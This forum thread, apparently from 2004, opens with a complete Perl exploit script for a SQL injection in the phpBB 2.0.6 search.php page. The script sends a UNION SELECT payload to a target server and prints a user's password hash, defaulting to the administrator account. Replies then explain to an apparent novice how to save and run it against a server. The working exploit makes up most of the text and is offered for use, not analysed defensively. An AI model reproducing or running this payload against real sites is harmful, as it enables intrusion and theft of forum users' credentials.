#!/usr/bin/perl -w use IO::Socket; ## PROOF-OF-CONCEPT ## * work only with mysql ver > 4.0 ## * work only with post #1 ## ## Example: ## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2 ## [~] prepare to connect... ## [+] connected ## [~] prepare to send data... ## [+] OK ## [~] wait for response... ## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99 ## if (@ARGV < 4) { print "\n\n"; print "|****************************************************************|\n"; print " r57phpbb.pl\n"; print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n"; print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n"; print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n"; print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n"; print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n"; print " [~] <server> - server ip\n"; print " [~] <folder> - forum folder\n"; print " [~] <user_id> - user id (2 default for phpBB admin)\n"; print " [~] <search_id> - play with this value for results\n"; print "|****************************************************************|\n"; print "\n\n"; exit(1); } $success = 0; $server = $ARGV[0]; $folder = $ARGV[1]; $user_id = $ARGV[2]; $search_id = $ARGV[3]; print "[~] prepare to connect...\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!"; print "[+] connected\n"; print "[~] prepare to send data...\n"; # PROOF-OF-CONCEPT reguest... print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat (char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,11 7,108, 116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95, 109, 97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,11 2,108, 105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50 ,58,34) ,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,10 5,58,48, 59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83 ,67,34, 59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,5 8,54, 58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95 ,99, 104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n"; print "[+] OK\n"; print "[~] wait for response...\n"; while ($answer = <$socket>) { if ($answer =~ /;highlight=/) { $success = 1; @result=split(/;/,$answer); @result2=split(/=/,$result[1]); $result2[1]=~s/&/ /g; print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n"; } } if ($success==0) {print "[-] exploit failed =(\n";} ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o -
Can somebody write me a "mini tutorial" on what I should be doing? Thanks!
bs_nbs
Nov 9 2004, 10:58 PM
Hey Toasty..
Seems you've put your hands on a perl script wich exploits a vuln in the search.php of phpbb forums..
First up google "perl usage" so you get an idea on how to run the script.
Rest seems pretty obvious as most scripts (and so does this one) includes the usage..
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n"; print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n"; print " [~] <server> - server ip\n"; print " [~] <folder> - forum folder\n"; print " [~] <user_id> - user id (2 default for phpBB admin)\n"; print " [~] <search_id> - play with this value for results\n";
As seen above, the code you've pasted here should be saved in a *.pl file which you would have found when googling
What it does is open a connection on port 80 of the target , send some malformed code and prints the MD5 Hash of the user you requested... If everything went right that is...
Toasty
Nov 9 2004, 11:20 PM
aaah ok thanks, yea I figured out saving it as a .pl file but big sirens went off and my antivirus went nuts so I figured better to ask before burrowing deeper. You've answered my question! Thanks!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
A really good idea to make it in 2 langauges resoect. I also will make TUT'S here wehn i learned some new. Was a good idea.
